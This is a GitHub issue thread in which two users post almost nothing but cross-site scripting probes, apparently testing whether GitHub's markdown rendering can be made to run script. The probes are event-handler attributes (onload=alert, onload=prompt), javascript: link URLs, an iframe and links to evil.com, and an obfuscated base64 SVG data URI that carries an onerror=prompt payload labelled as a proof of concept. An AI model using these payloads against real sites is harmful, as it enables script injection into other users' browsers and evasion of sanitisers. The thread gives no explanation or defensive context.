### ISSUE TITLE
dasd

### ISSUE THREAD

**Issue by joz0x** [rawezh80/newtest#1]
<img width="587" alt="image" src="https://github.com/rawezh80/newtest/assets/166255011/75eb1c04-d4d5-4f5e-a556-3ed900da0ff5" onload=alert(2)>

**Comment by rawezh000012** [comment]
<a href=https://evil.com><img width="587" alt="image" src="https://github.com/rawezh80/newtest/assets/166255011/ac9eb4cb-e1a5-44a8-9b85-3db4cd6ce577"></a>

**Comment by rawezh000012** [comment]
<a href=javascript:prompt('x')><img width="587" alt="image" src="https://github.com/rawezh80/newtest/assets/166255011/391e594f-8ded-4dfc-9fab-5150ccbc2a37"></a>

**Comment by rawezh000012** [comment]
<a href=https://evil.com><img width="587" alt="image" src="https://github.com/rawezh80/newtest/assets/166255011/391e594f-8ded-4dfc-9fab-5150ccbc2a37"></a>

**Comment by rawezh000012** [comment]
<a onload=prompt(1)><img width="587" alt="image" src="https://github.com/rawezh80/newtest/assets/166255011/391e594f-8ded-4dfc-9fab-5150ccbc2a37"></a>

**Comment by rawezh000012** [comment]
<a href=javascript:prompt('x')><img width="587" alt="image" src="https://github.com/rawezh80/newtest/assets/166255011/391e594f-8ded-4dfc-9fab-5150ccbc2a37">
<iframe src=https://evil.com>x</iframe></a>

**Comment by joz0x** [comment]
<img src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iODAwcHgiIGhlaWdodD0iODAwcHgiIHZpZXdCb3g9IjAgMCAzMiAzMiIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KICA8Zm9yZWlnbk9iamVjdCB4PSI1MCIgeT0iNTAiIHdpZHRoPSIzMDAiIGhlaWdodD0iMTAwIj4KICAgIDxpbWcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0ieCIgb25lcnJvcj0icHJvbXB0KCdyYXdlemhfcG9jJykiLz4KICA8L2ZvcmVpZ25PYmplY3Q+PHRpdGxlPmZpbGVfdHlwZV9mYWxjb248L3RpdGxlPgo8L3N2Zz4=" >

**Comment by joz0x** [comment]
<svg width="100" height="100">
  <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
</svg>

**Comment by joz0x** [comment]
www`<svg width="100" height="100">
  <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
</svg>`
